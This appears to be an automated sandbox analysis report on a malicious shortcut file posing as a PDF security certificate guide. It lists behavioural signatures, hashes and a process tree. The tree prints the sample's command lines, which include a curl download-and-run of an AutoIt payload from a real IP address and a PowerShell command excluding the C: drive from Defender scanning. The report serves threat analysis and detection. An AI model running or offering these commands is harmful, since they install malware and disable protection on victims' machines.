Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230831-en -
resource tags
arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system -
submitted
14/09/2023, 12:33
Static task
static1
Behavioral task
behavioral1
Sample
Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk
Resource
win10v2004-20230831-en
Behavioral task
behavioral3
Sample
Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk
Resource
macos-20230831-en
Behavioral task
behavioral4
Sample
Security Certificate Update Guide.pdf.lnk
Resource
win7-20230831-en
Behavioral task
behavioral5
Sample
Security Certificate Update Guide.pdf.lnk
Resource
win10v2004-20230831-en
Behavioral task
behavioral6
Sample
Security Certificate Update Guide.pdf.lnk
Resource
macos-20230831-en
General
-
Target
Security Certificate Update Guide.pdf.lnk
-
Size
1KB
-
MD5
3fb9fd77754aa0c99c7d7d1a71bc4216
-
SHA1
af30bf87d826912b06b62306864eb0bb5701636e
-
SHA256
aa82b70acc6f8acb4fefa6ca5af6cbd3b33cc18801e2d205c05d182553812309
-
SHA512
f8ac10c231f8ffe9e1e0e7456ba718bca35fa0a0cd1e8dad9d0267549567c6861261e677c1478c62096bfe3371aa4e11bc8f34037e74b97800339f6661002b1d
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 2160 created 1712 2160 Autoit3.exe 31 PID 2160 created 1712 2160 Autoit3.exe 31 PID 2928 created 3876 2928 cmd.exe 47 -
Blocklisted process makes network request 35 IoCs
flow pid Process 35 2928 cmd.exe 36 2928 cmd.exe 37 2928 cmd.exe 38 2928 cmd.exe 45 2928 cmd.exe 53 2928 cmd.exe 54 2928 cmd.exe 55 2928 cmd.exe 56 2928 cmd.exe 57 2928 cmd.exe 58 2928 cmd.exe 59 2928 cmd.exe 60 2928 cmd.exe 61 2928 cmd.exe 62 2928 cmd.exe 63 2928 cmd.exe 64 2928 cmd.exe 65 2928 cmd.exe 66 2928 cmd.exe 67 2928 cmd.exe 68 2928 cmd.exe 69 2928 cmd.exe 70 2928 cmd.exe 71 2928 cmd.exe 72 2928 cmd.exe 73 2928 cmd.exe 74 2928 cmd.exe 75 2928 cmd.exe 76 2928 cmd.exe 77 2928 cmd.exe 78 2928 cmd.exe 79 2928 cmd.exe 83 2928 cmd.exe 84 2928 cmd.exe 85 2928 cmd.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\afdbbka.lnk cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2160 Autoit3.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2160 set thread context of 2928 2160 Autoit3.exe 99 PID 2928 set thread context of 1680 2928 cmd.exe 101 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 2160 Autoit3.exe 2160 Autoit3.exe 2160 Autoit3.exe 2160 Autoit3.exe 2160 Autoit3.exe 2160 Autoit3.exe 2160 Autoit3.exe 2160 Autoit3.exe 2160 Autoit3.exe 2160 Autoit3.exe 2928 cmd.exe 2928 cmd.exe 2928 cmd.exe 2928 cmd.exe 4376 powershell.exe 4376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4376 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4148 wrote to memory of 1020 4148 cmd.exe 85 PID 4148 wrote to memory of 1020 4148 cmd.exe 85 PID 1020 wrote to memory of 1864 1020 cmd.exe 87 PID 1020 wrote to memory of 1864 1020 cmd.exe 87 PID 1020 wrote to memory of 2160 1020 cmd.exe 88 PID 1020 wrote to memory of 2160 1020 cmd.exe 88 PID 1020 wrote to memory of 2160 1020 cmd.exe 88 PID 2160 wrote to memory of 3912 2160 Autoit3.exe 89 PID 2160 wrote to memory of 3912 2160 Autoit3.exe 89 PID 2160 wrote to memory of 3912 2160 Autoit3.exe 89 PID 2160 wrote to memory of 3912 2160 Autoit3.exe 89 PID 2160 wrote to memory of 3912 2160 Autoit3.exe 89 PID 2160 wrote to memory of 3912 2160 Autoit3.exe 89 PID 2160 wrote to memory of 3912 2160 Autoit3.exe 89 PID 2160 wrote to memory of 3912 2160 Autoit3.exe 89 PID 2160 wrote to memory of 3912 2160 Autoit3.exe 89 PID 2160 wrote to memory of 3912 2160 Autoit3.exe 89 PID 2160 wrote to memory of 4936 2160 Autoit3.exe 96 PID 2160 wrote to memory of 4936 2160 Autoit3.exe 96 PID 2160 wrote to memory of 4936 2160 Autoit3.exe 96 PID 2160 wrote to memory of 4936 2160 Autoit3.exe 96 PID 2160 wrote to memory of 4936 2160 Autoit3.exe 96 PID 2160 wrote to memory of 4936 2160 Autoit3.exe 96 PID 2160 wrote to memory of 4936 2160 Autoit3.exe 96 PID 2160 wrote to memory of 4936 2160 Autoit3.exe 96 PID 2160 wrote to memory of 4936 2160 Autoit3.exe 96 PID 2160 wrote to memory of 4936 2160 Autoit3.exe 96 PID 2160 wrote to memory of 2928 2160 Autoit3.exe 99 PID 2160 wrote to memory of 2928 2160 Autoit3.exe 99 PID 2160 wrote to memory of 2928 2160 Autoit3.exe 99 PID 2160 wrote to memory of 2928 2160 Autoit3.exe 99 PID 2160 wrote to memory of 2928 2160 Autoit3.exe 99 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 1680 2928 cmd.exe 101 PID 2928 wrote to memory of 1680 2928 cmd.exe 101 PID 2928 wrote to memory of 1680 2928 cmd.exe 101 PID 2928 wrote to memory of 1680 2928 cmd.exe 101 PID 2928 wrote to memory of 1680 2928 cmd.exe 101 PID 2092 wrote to memory of 4376 2092 DllHost.exe 103 PID 2092 wrote to memory of 4376 2092 DllHost.exe 103 PID 2092 wrote to memory of 4376 2092 DllHost.exe 103 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100 PID 2928 wrote to memory of 5036 2928 cmd.exe 100
Processes
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca1⤵PID:1712
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"2⤵PID:3912
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"2⤵PID:4936
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3876
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"2⤵PID:5036
-
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Security Certificate Update Guide.pdf.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k curl -# -o "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "http://5.188.87.58:2351" -o "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3" "http://5.188.87.58:2351/msibmyzwoxl" & "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\system32\curl.execurl -# -o "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "http://5.188.87.58:2351" -o "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3" "http://5.188.87.58:2351/msibmyzwoxl"3⤵PID:1864
-
-
C:\Users\Admin\AppData\Local\Temp\Autoit3.exe"C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\cmd.execmd.exe4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\SysWOW64\cmd.execmd.exe5⤵PID:1680
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD595577eadc442d94cacaa6dd12e78ee5e
SHA1bbb9331cd55c53066f4e4ee00de02f18bee9d479
SHA256d7f75b1c71472ae2f6a636244524c978c5793b0c0d2e5f9889479bc10a65df24
SHA512c757fbbd6de36eadb250f984f529a2ec62d37d8c61fc076a00241ea801eb9c71bfaa605ab94378381a6f7e3f0f10b5587e3ee5e6bee607dafe6c1cd43581b1cf
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
902KB
MD5423753bd2867688d370d85ed54ca5990
SHA1e26bdcad0b2234ceecb0f35c08b7430be14eee29
SHA25694c4245037963f0dbc206eaaf5e8254e6bff32b6742367b1f7e639ec2645304d
SHA51269aa2b7be672243428371bfa388e1c977e26ede33babebab342080d952c3aa146f439877c2ed291a6b4eb01adb68ab1bea9d24738aa03522038f5d95101bd22f
-
Filesize
902KB
MD5423753bd2867688d370d85ed54ca5990
SHA1e26bdcad0b2234ceecb0f35c08b7430be14eee29
SHA25694c4245037963f0dbc206eaaf5e8254e6bff32b6742367b1f7e639ec2645304d
SHA51269aa2b7be672243428371bfa388e1c977e26ede33babebab342080d952c3aa146f439877c2ed291a6b4eb01adb68ab1bea9d24738aa03522038f5d95101bd22f